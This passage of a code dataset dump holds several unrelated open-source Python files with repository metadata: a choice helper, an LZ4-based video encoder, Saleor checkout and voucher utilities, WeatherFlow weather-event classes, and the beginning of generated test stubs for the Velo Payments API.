"Apache-2.0"
] | null | null | null |
from .log import LogUtil
class Choice:
def __init__(self, key, verbose):
self.key = key
self.verbose = verbose
class ChoiceUtil:
@classmethod
def get_choice(cls):
choice = []
for _k in cls.__dict__.keys():
if not _k.startswith("__") and not _k.endswith("__"):
_v = cls.__dict__[_k]
if type(_v) != Choice:
LogUtil.red("Check a '%s' class. elements must be 'Choice' type ..." % cls.__name__)
return None
choice.append((_v.key, _v.verbose))
return choice
| 22.703704
| 104
| 0.530179
|
ed1487901aa936467f1600c91ea569d0b6e87a91
| 5,420
|
py
|
Python
|
reference/lvenc/encoder.py
|
tuxzz/lightvideo
|
3654d7a452ec42a7e2d40129ef571375e5f93ddb
|
[
"MIT"
] | 2
|
2019-05-05T22:37:19.000Z
|
2021-05-17T03:32:44.000Z
|
reference/lvenc/encoder.py
|
tuxzz/lightvideo
|
3654d7a452ec42a7e2d40129ef571375e5f93ddb
|
[
"MIT"
] | null | null | null |
reference/lvenc/encoder.py
|
tuxzz/lightvideo
|
3654d7a452ec42a7e2d40129ef571375e5f93ddb
|
[
"MIT"
] | null | null | null |
import numpy as np
import ctypes, io, struct
from .struct import *
from . import enccore, clz4, report
import signal, threading, multiprocessing, time
import cv2
_LZ4_COMPRESSION_LEVEL = 11
class DelayedKeyboardInterrupt(object):
def __enter__(self):
self.signal_received = False
self.old_handler = signal.getsignal(signal.SIGINT)
signal.signal(signal.SIGINT, self.handler)
def handler(self, sig, frame):
self.signal_received = (sig, frame)
def __exit__(self, type, value, traceback):
if(self.old_handler is not None):
signal.signal(signal.SIGINT, self.old_handler)
if(self.signal_received):
self.old_handler(*self.signal_received)
class Encoder:
def __init__(self, stream, width, height, framerate, dtype, nFullSizeChannel, nHalfSizeChannel, **kwargs):
self.stream = stream
self.stream.seek(ctypes.sizeof(MainStruct))
self.width = int(width)
self.height = int(height)
self.framerate = int(framerate)
self.dtype = dtype
self.userData = np.uint64(kwargs.get("userData", 0))
self.dropThreshold = int(kwargs.get("dropThreshold", 1 if self.dtype == np.uint8 else 128))
if(not self.dtype in (np.uint8, np.uint16)):
raise TypeError("Only uint8 and uint16 is supported")
self.nFullSizeChannel = int(nFullSizeChannel)
self.nHalfSizeChannel = int(nHalfSizeChannel)
if(self.nHalfSizeChannel < 0 or self.nHalfSizeChannel > 4):
raise ValueError("Channel layout for each type must be in range [0, 4]")
if(self.nFullSizeChannel < 0 or self.nFullSizeChannel > 4):
raise ValueError("Channel layout for each type must be in range [0, 4]")
if(self.nHalfSizeChannel + self.nFullSizeChannel <= 0):
raise ValueError("Total channel count must be greater than 0")
wInvalid = self.width <= 0 or self.width > 32767
hInvalid = self.height <= 0 or self.height > 32767
if(wInvalid or hInvalid):
raise ValueError("width and height must be in range [1, 32767]")
if(self.framerate <= 0 or self.framerate > 255):
raise ValueError("framerate must be in range [1, 255]")
elif(self.dropThreshold > 65535):
raise ValueError("dropThreshold for 16bit color format must be less than 65536")
self.prevImgList = None
self.prevFullImgList = None
self.nFrame = 0
def __enter__(self):
return self
def __exit__(self, type, value, trace):
with DelayedKeyboardInterrupt():
self.stream.seek(0)
mainStruct = MainStruct()
mainStruct.aria = b'ARiA'
mainStruct.version = 0
mainStruct.nChannel = self.nFullSizeChannel | (self.nHalfSizeChannel << 4)
mainStruct.flags = int(self.dtype == np.uint16)
mainStruct.framerate = self.framerate
mainStruct.width = self.width
mainStruct.height = self.height
mainStruct.nFrame = self.nFrame
mainStruct.userData = np.uint64(self.userData)
self.stream.write(mainStruct)
self.stream.seek(0, io.SEEK_END)
self.stream.flush()
def __del__(self):
pass
def feedFrame(self, fullImg, halfImg):
assert fullImg is None or (fullImg.ndim == 3 and fullImg.dtype == self.dtype and fullImg.shape[-1] == self.nFullSizeChannel)
assert halfImg is None or (halfImg.ndim == 3 and halfImg.dtype == self.dtype and halfImg.shape[-1] == self.nHalfSizeChannel)
assert fullImg is not None or halfImg is not None
report.enter("frame %d" % self.nFrame)
if(fullImg is not None and halfImg is not None):
iFull = 0
iHalf = 1
imgList = [fullImg, halfImg]
elif(fullImg is not None):
iFull = 0
imgList = [fullImg]
else:
iHalf = 1
imgList = [halfImg]
# do filter
result = enccore.applyBestFilter(imgList, self.prevFullImgList, self.prevImgList, self.dropThreshold)
# serialize and compress
vf = VideoFrameStruct()
vf.vfrm = b'VFRM'
vf.referenceType = result["deltaMethod"]
if(fullImg is not None):
vf.intraMethod[0] = result["bestResult"][iFull]["intraMethod"]
if(halfImg is not None):
vf.intraMethod[1] = result["bestResult"][iHalf]["intraMethod"]
data = io.BytesIO()
for channelResult in result["bestResult"]:
data.write(channelResult["filtered"])
# write
data = clz4.LZ4CompressionTask(data.getvalue(), clz4.COMPRESS_MODE_HC, _LZ4_COMPRESSION_LEVEL).get()
vf.size = len(data)
with DelayedKeyboardInterrupt():
self.stream.write(vf)
self.stream.write(data)
self.nFrame += 1
self.prevImgList = []
for channelResult in result["bestResult"]:
self.prevImgList.append(channelResult["decompressed"])
if(result["deltaMethod"] == REFERENCE_NONE):
self.prevFullImgList = self.prevImgList
# clean up
report.leave()
| 39.275362
| 133
| 0.602952
|
4cf4e4d546d2ba01bffbb13bb51a63680f2358ee
| 22,975
|
py
|
Python
|
saleor/saleor/checkout/utils.py
|
nguyentrung194/e-com
|
e1fbf6259ba832040b9cf0ec6a7adf1b43a8539a
|
[
"BSD-3-Clause"
] | null | null | null |
saleor/saleor/checkout/utils.py
|
nguyentrung194/e-com
|
e1fbf6259ba832040b9cf0ec6a7adf1b43a8539a
|
[
"BSD-3-Clause"
] | null | null | null |
saleor/saleor/checkout/utils.py
|
nguyentrung194/e-com
|
e1fbf6259ba832040b9cf0ec6a7adf1b43a8539a
|
[
"BSD-3-Clause"
] | null | null | null |
"""Checkout-related utility functions."""
from decimal import Decimal
from typing import TYPE_CHECKING, Iterable, List, Optional, Tuple
import graphene
from django.core.exceptions import ValidationError
from django.utils import timezone
from prices import Money
from ..account.models import User
from ..core.exceptions import ProductNotPublished
from ..core.taxes import zero_taxed_money
from ..core.utils.promo_code import (
InvalidPromoCode,
promo_code_is_gift_card,
promo_code_is_voucher,
)
from ..discount import DiscountInfo, VoucherType
from ..discount.models import NotApplicable, Voucher
from ..discount.utils import (
get_products_voucher_discount,
validate_voucher_for_checkout,
)
from ..giftcard.utils import (
add_gift_card_code_to_checkout,
remove_gift_card_code_from_checkout,
)
from ..plugins.manager import PluginsManager
from ..product import models as product_models
from ..shipping.models import ShippingMethod
from ..warehouse.availability import check_stock_quantity, check_stock_quantity_bulk
from . import AddressType, calculations
from .error_codes import CheckoutErrorCode
from .fetch import (
update_checkout_info_shipping_address,
update_checkout_info_shipping_method,
)
from .models import Checkout, CheckoutLine
if TYPE_CHECKING:
# flake8: noqa
from prices import TaxedMoney
from ..account.models import Address
from .fetch import CheckoutInfo, CheckoutLineInfo
def get_user_checkout(
user: User, checkout_queryset=Checkout.objects.all()
) -> Tuple[Optional[Checkout], bool]:
return checkout_queryset.filter(user=user, channel__is_active=True).first()
def check_variant_in_stock(
checkout: Checkout,
variant: product_models.ProductVariant,
channel_slug: str,
quantity: int = 1,
replace: bool = False,
check_quantity: bool = True,
) -> Tuple[int, Optional[CheckoutLine]]:
"""Check if a given variant is in stock and return the new quantity + line."""
line = checkout.lines.filter(variant=variant).first()
line_quantity = 0 if line is None else line.quantity
new_quantity = quantity if replace else (quantity + line_quantity)
if new_quantity < 0:
raise ValueError(
"%r is not a valid quantity (results in %r)" % (quantity, new_quantity)
)
if new_quantity > 0 and check_quantity:
check_stock_quantity(
variant, checkout.get_country(), channel_slug, new_quantity
)
return new_quantity, line
def add_variant_to_checkout(
checkout_info: "CheckoutInfo",
variant: product_models.ProductVariant,
quantity: int = 1,
replace: bool = False,
check_quantity: bool = True,
):
"""Add a product variant to checkout.
If `replace` is truthy then any previous quantity is discarded instead
of added to.
"""
checkout = checkout_info.checkout
product_channel_listing = product_models.ProductChannelListing.objects.filter(
channel_id=checkout.channel_id, product_id=variant.product_id
).first()
if not product_channel_listing or not product_channel_listing.is_published:
raise ProductNotPublished()
new_quantity, line = check_variant_in_stock(
checkout,
variant,
checkout_info.channel.slug,
quantity=quantity,
replace=replace,
check_quantity=check_quantity,
)
if line is None:
line = checkout.lines.filter(variant=variant).first()
if new_quantity == 0:
if line is not None:
line.delete()
elif line is None:
checkout.lines.create(checkout=checkout, variant=variant, quantity=new_quantity)
elif new_quantity > 0:
line.quantity = new_quantity
line.save(update_fields=["quantity"])
return checkout
def calculate_checkout_quantity(lines: Iterable["CheckoutLineInfo"]):
return sum([line_info.line.quantity for line_info in lines])
def add_variants_to_checkout(checkout, variants, quantities, replace=False):
"""Add variants to checkout.
If a variant is not placed in checkout, a new checkout line will be created.
If quantity is set to 0, checkout line will be deleted.
Otherwise, quantity will be added or replaced (if replace argument is True).
"""
variant_ids_in_lines = {line.variant_id: line for line in checkout.lines.all()}
to_create = []
to_update = []
to_delete = []
for variant, quantity in zip(variants, quantities):
if variant.pk in variant_ids_in_lines:
line = variant_ids_in_lines[variant.pk]
if quantity > 0:
if replace:
line.quantity = quantity
else:
line.quantity += quantity
to_update.append(line)
else:
to_delete.append(line)
elif quantity > 0:
to_create.append(
CheckoutLine(checkout=checkout, variant=variant, quantity=quantity)
)
if to_delete:
CheckoutLine.objects.filter(pk__in=[line.pk for line in to_delete]).delete()
if to_update:
CheckoutLine.objects.bulk_update(to_update, ["quantity"])
if to_create:
CheckoutLine.objects.bulk_create(to_create)
return checkout
def _check_new_checkout_address(checkout, address, address_type):
"""Check if and address in checkout has changed and if to remove old one."""
if address_type == AddressType.BILLING:
old_address = checkout.billing_address
else:
old_address = checkout.shipping_address
has_address_changed = any(
[
not address and old_address,
address and not old_address,
address and old_address and address != old_address,
]
)
remove_old_address = (
has_address_changed
and old_address is not None
and (not checkout.user or old_address not in checkout.user.addresses.all())
)
return has_address_changed, remove_old_address
def change_billing_address_in_checkout(checkout, address):
"""Save billing address in checkout if changed.
Remove previously saved address if not connected to any user.
"""
changed, remove = _check_new_checkout_address(
checkout, address, AddressType.BILLING
)
if changed:
if remove:
checkout.billing_address.delete()
checkout.billing_address = address
checkout.save(update_fields=["billing_address", "last_change"])
def change_shipping_address_in_checkout(
checkout_info: "CheckoutInfo",
address: "Address",
lines: Iterable["CheckoutLineInfo"],
discounts: Iterable[DiscountInfo],
manager: "PluginsManager",
):
"""Save shipping address in checkout if changed.
Remove previously saved address if not connected to any user.
"""
checkout = checkout_info.checkout
changed, remove = _check_new_checkout_address(
checkout, address, AddressType.SHIPPING
)
if changed:
if remove:
checkout.shipping_address.delete() # type: ignore
checkout.shipping_address = address
update_checkout_info_shipping_address(
checkout_info, address, lines, discounts, manager
)
checkout.save(update_fields=["shipping_address", "last_change"])
def _get_shipping_voucher_discount_for_checkout(
manager: PluginsManager,
voucher: Voucher,
checkout_info: "CheckoutInfo",
lines: Iterable["CheckoutLineInfo"],
address: Optional["Address"],
discounts: Optional[Iterable[DiscountInfo]] = None,
):
"""Calculate discount value for a voucher of shipping type."""
if not is_shipping_required(lines):
msg = "Your order does not require shipping."
raise NotApplicable(msg)
shipping_method = checkout_info.shipping_method
if not shipping_method:
msg = "Please select a shipping method first."
raise NotApplicable(msg)
# check if voucher is limited to specified countries
if address:
if voucher.countries and address.country.code not in voucher.countries:
msg = "This offer is not valid in your country."
raise NotApplicable(msg)
shipping_price = calculations.checkout_shipping_price(
manager=manager,
checkout_info=checkout_info,
lines=lines,
address=address,
discounts=discounts,
).gross
return voucher.get_discount_amount_for(shipping_price, checkout_info.channel)
def _get_products_voucher_discount(
manager: PluginsManager,
checkout_info: "CheckoutInfo",
lines: Iterable["CheckoutLineInfo"],
voucher,
discounts: Optional[Iterable[DiscountInfo]] = None,
):
"""Calculate products discount value for a voucher, depending on its type."""
prices = None
if voucher.type == VoucherType.SPECIFIC_PRODUCT:
prices = get_prices_of_discounted_specific_product(
manager, checkout_info, lines, voucher, discounts
)
if not prices:
msg = "This offer is only valid for selected items."
raise NotApplicable(msg)
return get_products_voucher_discount(voucher, prices, checkout_info.channel)
def get_discounted_lines(
lines: Iterable["CheckoutLineInfo"], voucher
) -> Iterable["CheckoutLineInfo"]:
discounted_products = voucher.products.all()
discounted_categories = set(voucher.categories.all())
discounted_collections = set(voucher.collections.all())
discounted_lines = []
if discounted_products or discounted_collections or discounted_categories:
for line_info in lines:
line_product = line_info.product
line_category = line_info.product.category
line_collections = set(line_info.collections)
if line_info.variant and (
line_product in discounted_products
or line_category in discounted_categories
or line_collections.intersection(discounted_collections)
):
discounted_lines.append(line_info)
else:
# If there's no discounted products, collections or categories,
# it means that all products are discounted
discounted_lines.extend(lines)
return discounted_lines
def get_prices_of_discounted_specific_product(
manager: PluginsManager,
checkout_info: "CheckoutInfo",
lines: Iterable["CheckoutLineInfo"],
voucher: Voucher,
discounts: Optional[Iterable[DiscountInfo]] = None,
) -> List[Money]:
"""Get prices of variants belonging to the discounted specific products.
Specific products are products, collections and categories.
Product must be assigned directly to the discounted category, assigning
product to child category won't work.
"""
line_prices = []
discounted_lines: Iterable["CheckoutLineInfo"] = get_discounted_lines(
lines, voucher
)
address = checkout_info.shipping_address or checkout_info.billing_address
discounts = discounts or []
for line_info in discounted_lines:
line = line_info.line
line_total = calculations.checkout_line_total(
manager=manager,
checkout_info=checkout_info,
lines=lines,
checkout_line_info=line_info,
discounts=discounts,
)
line_unit_price = manager.calculate_checkout_line_unit_price(
line_total,
line.quantity,
checkout_info,
lines,
line_info,
address,
discounts,
).gross
line_prices.extend([line_unit_price] * line.quantity)
return line_prices
def get_voucher_discount_for_checkout(
manager: PluginsManager,
voucher: Voucher,
checkout_info: "CheckoutInfo",
lines: Iterable["CheckoutLineInfo"],
address: Optional["Address"],
discounts: Optional[Iterable[DiscountInfo]] = None,
) -> Money:
"""Calculate discount value depending on voucher and discount types.
Raise NotApplicable if voucher of given type cannot be applied.
"""
validate_voucher_for_checkout(manager, voucher, checkout_info, lines, discounts)
if voucher.type == VoucherType.ENTIRE_ORDER:
subtotal = calculations.checkout_subtotal(
manager=manager,
checkout_info=checkout_info,
lines=lines,
address=address,
discounts=discounts,
).gross
return voucher.get_discount_amount_for(subtotal, checkout_info.channel)
if voucher.type == VoucherType.SHIPPING:
return _get_shipping_voucher_discount_for_checkout(
manager, voucher, checkout_info, lines, address, discounts
)
if voucher.type == VoucherType.SPECIFIC_PRODUCT:
return _get_products_voucher_discount(
manager, checkout_info, lines, voucher, discounts
)
raise NotImplementedError("Unknown discount type")
def get_voucher_for_checkout(
checkout_info: "CheckoutInfo", vouchers=None, with_lock: bool = False
) -> Optional[Voucher]:
"""Return voucher with voucher code saved in checkout if active or None."""
checkout = checkout_info.checkout
if checkout.voucher_code is not None:
if vouchers is None:
vouchers = Voucher.objects.active_in_channel(
date=timezone.now(), channel_slug=checkout_info.channel.slug
)
try:
qs = vouchers
voucher = qs.get(code=checkout.voucher_code)
if voucher and voucher.usage_limit is not None and with_lock:
voucher = vouchers.select_for_update().get(code=checkout.voucher_code)
return voucher
except Voucher.DoesNotExist:
return None
return None
def recalculate_checkout_discount(
manager: PluginsManager,
checkout_info: "CheckoutInfo",
lines: Iterable["CheckoutLineInfo"],
discounts: Iterable[DiscountInfo],
):
"""Recalculate `checkout.discount` based on the voucher.
Will clear both voucher and discount if the discount is no longer
applicable.
"""
checkout = checkout_info.checkout
voucher = get_voucher_for_checkout(checkout_info)
if voucher is not None:
address = checkout_info.shipping_address or checkout_info.billing_address
try:
discount = get_voucher_discount_for_checkout(
manager, voucher, checkout_info, lines, address, discounts
)
except NotApplicable:
remove_voucher_from_checkout(checkout)
else:
subtotal = calculations.checkout_subtotal(
manager=manager,
checkout_info=checkout_info,
lines=lines,
address=address,
discounts=discounts,
).gross
checkout.discount = (
min(discount, subtotal)
if voucher.type != VoucherType.SHIPPING
else discount
)
checkout.discount_name = voucher.name
checkout.translated_discount_name = (
voucher.translated.name
if voucher.translated.name != voucher.name
else ""
)
checkout.save(
update_fields=[
"translated_discount_name",
"discount_amount",
"discount_name",
"currency",
]
)
else:
remove_voucher_from_checkout(checkout)
def add_promo_code_to_checkout(
manager: PluginsManager,
checkout_info: "CheckoutInfo",
lines: Iterable["CheckoutLineInfo"],
promo_code: str,
discounts: Optional[Iterable[DiscountInfo]] = None,
):
"""Add gift card or voucher data to checkout.
Raise InvalidPromoCode if promo code does not match to any voucher or gift card.
"""
if promo_code_is_voucher(promo_code):
add_voucher_code_to_checkout(
manager, checkout_info, lines, promo_code, discounts
)
elif promo_code_is_gift_card(promo_code):
add_gift_card_code_to_checkout(checkout_info.checkout, promo_code)
else:
raise InvalidPromoCode()
def add_voucher_code_to_checkout(
manager: PluginsManager,
checkout_info: "CheckoutInfo",
lines: Iterable["CheckoutLineInfo"],
voucher_code: str,
discounts: Optional[Iterable[DiscountInfo]] = None,
):
"""Add voucher data to checkout by code.
Raise InvalidPromoCode() if voucher of given type cannot be applied.
"""
try:
voucher = Voucher.objects.active_in_channel(
date=timezone.now(), channel_slug=checkout_info.channel.slug
).get(code=voucher_code)
except Voucher.DoesNotExist:
raise InvalidPromoCode()
try:
add_voucher_to_checkout(manager, checkout_info, lines, voucher, discounts)
except NotApplicable:
raise ValidationError(
{
"promo_code": ValidationError(
"Voucher is not applicable to that checkout.",
code=CheckoutErrorCode.VOUCHER_NOT_APPLICABLE.value,
)
}
)
def add_voucher_to_checkout(
manager: PluginsManager,
checkout_info: "CheckoutInfo",
lines: Iterable["CheckoutLineInfo"],
voucher: Voucher,
discounts: Optional[Iterable[DiscountInfo]] = None,
):
"""Add voucher data to checkout.
Raise NotApplicable if voucher of given type cannot be applied.
"""
checkout = checkout_info.checkout
address = checkout_info.shipping_address or checkout_info.billing_address
discount = get_voucher_discount_for_checkout(
manager, voucher, checkout_info, lines, address, discounts
)
checkout.voucher_code = voucher.code
checkout.discount_name = voucher.name
checkout.translated_discount_name = (
voucher.translated.name if voucher.translated.name != voucher.name else ""
)
checkout.discount = discount
checkout.save(
update_fields=[
"voucher_code",
"discount_name",
"translated_discount_name",
"discount_amount",
]
)
def remove_promo_code_from_checkout(checkout_info: "CheckoutInfo", promo_code: str):
"""Remove gift card or voucher data from checkout."""
if promo_code_is_voucher(promo_code):
remove_voucher_code_from_checkout(checkout_info, promo_code)
elif promo_code_is_gift_card(promo_code):
remove_gift_card_code_from_checkout(checkout_info.checkout, promo_code)
def remove_voucher_code_from_checkout(checkout_info: "CheckoutInfo", voucher_code: str):
"""Remove voucher data from checkout by code."""
existing_voucher = get_voucher_for_checkout(checkout_info)
if existing_voucher and existing_voucher.code == voucher_code:
remove_voucher_from_checkout(checkout_info.checkout)
def remove_voucher_from_checkout(checkout: Checkout):
"""Remove voucher data from checkout."""
checkout.voucher_code = None
checkout.discount_name = None
checkout.translated_discount_name = None
checkout.discount_amount = Decimal("0.000")
checkout.save(
update_fields=[
"voucher_code",
"discount_name",
"translated_discount_name",
"discount_amount",
"currency",
]
)
def get_valid_shipping_methods_for_checkout(
checkout_info: "CheckoutInfo",
lines: Iterable["CheckoutLineInfo"],
subtotal: "TaxedMoney",
country_code: Optional[str] = None,
):
if not is_shipping_required(lines):
return None
if not checkout_info.shipping_address:
return None
return ShippingMethod.objects.applicable_shipping_methods_for_instance(
checkout_info.checkout,
channel_id=checkout_info.checkout.channel_id,
price=subtotal.gross,
country_code=country_code, # type: ignore
lines=lines,
)
def is_valid_shipping_method(checkout_info: "CheckoutInfo"):
"""Check if shipping method is valid and remove (if not)."""
if not checkout_info.shipping_method:
return False
if not checkout_info.shipping_address:
return False
valid_methods = checkout_info.valid_shipping_methods
if valid_methods is None or checkout_info.shipping_method not in valid_methods:
clear_shipping_method(checkout_info)
return False
return True
def clear_shipping_method(checkout_info: "CheckoutInfo"):
checkout = checkout_info.checkout
checkout.shipping_method = None
update_checkout_info_shipping_method(checkout_info, None)
checkout.save(update_fields=["shipping_method", "last_change"])
def is_fully_paid(
manager: PluginsManager,
checkout_info: "CheckoutInfo",
lines: Iterable["CheckoutLineInfo"],
discounts: Iterable[DiscountInfo],
):
"""Check if provided payment methods cover the checkout's total amount.
Note that these payments may not be captured or charged at all.
"""
checkout = checkout_info.checkout
payments = [payment for payment in checkout.payments.all() if payment.is_active]
total_paid = sum([p.total for p in payments])
address = checkout_info.shipping_address or checkout_info.billing_address
checkout_total = (
calculations.checkout_total(
manager=manager,
checkout_info=checkout_info,
lines=lines,
address=address,
discounts=discounts,
)
- checkout.get_total_gift_cards_balance()
)
checkout_total = max(
checkout_total, zero_taxed_money(checkout_total.currency)
).gross
return total_paid >= checkout_total.amount
def cancel_active_payments(checkout: Checkout):
checkout.payments.filter(is_active=True).update(is_active=False)
def is_shipping_required(lines: Iterable["CheckoutLineInfo"]):
"""Check if shipping is required for given checkout lines."""
return any(
line_info.product.product_type.is_shipping_required for line_info in lines
)
def validate_variants_in_checkout_lines(lines: Iterable["CheckoutLineInfo"]):
variants_listings_map = {line.variant.id: line.channel_listing for line in lines}
not_available_variants = [
variant_id
for variant_id, channel_listing in variants_listings_map.items()
if channel_listing is None or channel_listing.price is None
]
if not_available_variants:
not_available_variants_ids = {
graphene.Node.to_global_id("ProductVariant", pk)
for pk in not_available_variants
}
error_code = CheckoutErrorCode.UNAVAILABLE_VARIANT_IN_CHANNEL
raise ValidationError(
{
"lines": ValidationError(
"Cannot add lines with unavailable variants.",
code=error_code, # type: ignore
params={"variants": not_available_variants_ids},
)
}
)
| 34.087537
| 88
| 0.682786
|
68e30bfd12d1e1270cd1d5f929a0918ecf6a6c27
| 2,583
|
py
|
Python
|
pyweatherflowudp/event.py
|
briis/pyweatherflowudp
|
5a28d674aff4aac8c5cdf6c27f71eee4b98c25e3
|
[
"MIT"
] | 3
|
2021-12-22T21:53:07.000Z
|
2022-01-11T17:28:35.000Z
|
pyweatherflowudp/event.py
|
briis/pyweatherflowudp
|
5a28d674aff4aac8c5cdf6c27f71eee4b98c25e3
|
[
"MIT"
] | 2
|
2021-12-01T06:27:58.000Z
|
2021-12-02T08:45:32.000Z
|
pyweatherflowudp/event.py
|
briis/pyweatherflowudp
|
5a28d674aff4aac8c5cdf6c27f71eee4b98c25e3
|
[
"MIT"
] | 1
|
2021-12-26T18:24:13.000Z
|
2021-12-26T18:24:13.000Z
|
"""Events for WeatherFlow devices."""
from __future__ import annotations
from dataclasses import dataclass
from datetime import datetime
from pint import Quantity
from .const import UNIT_DEGREES, UNIT_KILOMETERS, UNIT_METERS_PER_SECOND
from .helpers import nvl, utc_timestamp_from_epoch
# pylint: disable=line-too-long
@dataclass
class Event:
"""Event base class."""
_epoch: int
@property
def epoch(self) -> int:
"""Return epoch in seconds."""
return self._epoch
@property
def timestamp(self) -> datetime | None:
"""Return the timestamp in UTC."""
return utc_timestamp_from_epoch(self._epoch)
def __repr__(self) -> str: # pragma: no cover
"""Return repr(self)."""
return f"Event<timestamp={self.timestamp}>"
@dataclass
class LightningStrikeEvent(Event):
"""Lightning strike event class."""
_distance: float | None
_energy: int | None
@property
def distance(self) -> Quantity[float]:
"""Return the distance in kilometers."""
return nvl(self._distance, 0) * UNIT_KILOMETERS
@property
def energy(self) -> int:
"""Return the energy.
Energy is just a pure number and has no physical meaning.
"""
return nvl(self._energy, 0)
def __repr__(self) -> str: # pragma: no cover
"""Return repr(self)."""
return (
f"Lightning Strike Event<timestamp={self.timestamp}, speed={self.distance}>"
)
@dataclass
class RainStartEvent(Event):
"""Rain start event class."""
def __repr__(self) -> str: # pragma: no cover
"""Return repr(self)."""
return f"Rain Start Event<timestamp={self.timestamp}>"
@dataclass
class WindEvent(Event):
"""Wind event class."""
_speed: float | None
_direction: int | None
@property
def direction(self) -> Quantity[int]:
"""Return the direction in degrees."""
return nvl(self._direction, 0) * UNIT_DEGREES
@property
def speed(self) -> Quantity[float]:
"""Return the speed in meters per second."""
return nvl(self._speed, 0) * UNIT_METERS_PER_SECOND
def __repr__(self) -> str: # pragma: no cover
"""Return repr(self)."""
return f"Wind Event<timestamp={self.timestamp}, speed={self.speed}, direction={self.direction.m}°>"
@dataclass
class CustomEvent(Event):
"""Custom event."""
name: str
def __repr__(self) -> str: # pragma: no cover
"""Return repr(self)."""
return f"Event<timestamp={self.timestamp}, name={self.name}>"
| 25.07767
| 107
| 0.634921
|
df1d8a8e11de546144920b0a9e59e0134b69e2f6
| 8,130
|
py
|
Python
|
test/test_funding_manager_api.py
|
velopaymentsapi/velo-python
|
59b39555e9714139b4bf697151cc7d15f6dd510e
|
[
"Apache-2.0"
] | null | null | null |
test/test_funding_manager_api.py
|
velopaymentsapi/velo-python
|
59b39555e9714139b4bf697151cc7d15f6dd510e
|
[
"Apache-2.0"
] | null | null | null |
test/test_funding_manager_api.py
|
velopaymentsapi/velo-python
|
59b39555e9714139b4bf697151cc7d15f6dd510e
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Velo Payments APIs
## Terms and Definitions Throughout this document and the Velo platform the following terms are used: * **Payor.** An entity (typically a corporation) which wishes to pay funds to one or more payees via a payout. * **Payee.** The recipient of funds paid out by a payor. * **Payment.** A single transfer of funds from a payor to a payee. * **Payout.** A batch of Payments, typically used by a payor to logically group payments (e.g. by business day). Technically there need be no relationship between the payments in a payout - a single payout can contain payments to multiple payees and/or multiple payments to a single payee. * **Sandbox.** An integration environment provided by Velo Payments which offers a similar API experience to the production environment, but all funding and payment events are simulated, along with many other services such as OFAC sanctions list checking. ## Overview The Velo Payments API allows a payor to perform a number of operations. The following is a list of the main capabilities in a natural order of execution: * Authenticate with the Velo platform * Maintain a collection of payees * Query the payor’s current balance of funds within the platform and perform additional funding * Issue payments to payees * Query the platform for a history of those payments This document describes the main concepts and APIs required to get up and running with the Velo Payments platform. It is not an exhaustive API reference. For that, please see the separate Velo Payments API Reference. ## API Considerations The Velo Payments API is REST based and uses the JSON format for requests and responses. Most calls are secured using OAuth 2 security and require a valid authentication access token for successful operation. See the Authentication section for details. Where a dynamic value is required in the examples below, the {token} format is used, suggesting that the caller needs to supply the appropriate value of the token in question (without including the { or } characters). Where curl examples are given, the –d @filename.json approach is used, indicating that the request body should be placed into a file named filename.json in the current directory. Each of the curl examples in this document should be considered a single line on the command-line, regardless of how they appear in print. ## Authenticating with the Velo Platform Once Velo backoffice staff have added your organization as a payor within the Velo platform sandbox, they will create you a payor Id, an API key and an API secret and share these with you in a secure manner. You will need to use these values to authenticate with the Velo platform in order to gain access to the APIs. The steps to take are explained in the following: create a string comprising the API key (e.g. 44a9537d-d55d-4b47-8082-14061c2bcdd8) and API secret (e.g. c396b26b-137a-44fd-87f5-34631f8fd529) with a colon between them. E.g. 44a9537d-d55d-4b47-8082-14061c2bcdd8:c396b26b-137a-44fd-87f5-34631f8fd529 base64 encode this string. E.g.: NDRhOTUzN2QtZDU1ZC00YjQ3LTgwODItMTQwNjFjMmJjZGQ4OmMzOTZiMjZiLTEzN2EtNDRmZC04N2Y1LTM0NjMxZjhmZDUyOQ== create an HTTP **Authorization** header with the value set to e.g. Basic NDRhOTUzN2QtZDU1ZC00YjQ3LTgwODItMTQwNjFjMmJjZGQ4OmMzOTZiMjZiLTEzN2EtNDRmZC04N2Y1LTM0NjMxZjhmZDUyOQ== perform the Velo authentication REST call using the HTTP header created above e.g. via curl: ``` curl -X POST \\ -H \"Content-Type: application/json\" \\ -H \"Authorization: Basic NDRhOTUzN2QtZDU1ZC00YjQ3LTgwODItMTQwNjFjMmJjZGQ4OmMzOTZiMjZiLTEzN2EtNDRmZC04N2Y1LTM0NjMxZjhmZDUyOQ==\" \\ 'https://api.sandbox.velopayments.com/v1/authenticate?grant_type=client_credentials' ``` If successful, this call will result in a **200** HTTP status code and a response body such as: ``` { \"access_token\":\"19f6bafd-93fd-4747-b229-00507bbc991f\", \"token_type\":\"bearer\", \"expires_in\":1799, \"scope\":\"...\" } ``` ## API access following authentication Following successful authentication, the value of the access_token field in the response (indicated in green above) should then be presented with all subsequent API calls to allow the Velo platform to validate that the caller is authenticated. This is achieved by setting the HTTP Authorization header with the value set to e.g. Bearer 19f6bafd-93fd-4747-b229-00507bbc991f such as the curl example below: ``` -H \"Authorization: Bearer 19f6bafd-93fd-4747-b229-00507bbc991f \" ``` If you make other Velo API calls which require authorization but the Authorization header is missing or invalid then you will get a **401** HTTP status response. # noqa: E501
The version of the OpenAPI document: 2.26.124
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import velo_payments
from velo_payments.api.funding_manager_api import FundingManagerApi # noqa: E501
from velo_payments.rest import ApiException
class TestFundingManagerApi(unittest.TestCase):
"""FundingManagerApi unit test stubs"""
def setUp(self):
self.api = velo_payments.api.funding_manager_api.FundingManagerApi() # noqa: E501
def tearDown(self):
pass
def test_create_ach_funding_request(self):
"""Test case for create_ach_funding_request
Create Funding Request # noqa: E501
"""
pass
def test_create_funding_request(self):
"""Test case for create_funding_request
Create Funding Request # noqa: E501
"""
pass
def test_create_funding_request_v3(self):
"""Test case for create_funding_request_v3
Create Funding Request # noqa: E501
"""
pass
def test_get_funding_account(self):
"""Test case for get_funding_account
Get Funding Account # noqa: E501
"""
pass
def test_get_funding_account_v2(self):
"""Test case for get_funding_account_v2
Get Funding Account # noqa: E501
"""
pass
def test_get_funding_accounts(self):
"""Test case for get_funding_accounts
Get Funding Accounts # noqa: E501
"""
pass
def test_get_funding_accounts_v2(self):
"""Test case for get_funding_accounts_v2
Get Funding Accounts # noqa: E501
"""
pass
def test_get_source_account(self):
"""Test case for get_source_account
Get details about given source account. # noqa: E501
"""
pass
def test_get_source_account_v2(self):
"""Test case for get_source_account_v2
Get details about given source account. # noqa: E501
"""
pass
def test_get_source_account_v3(self):
"""Test case for get_source_account_v3
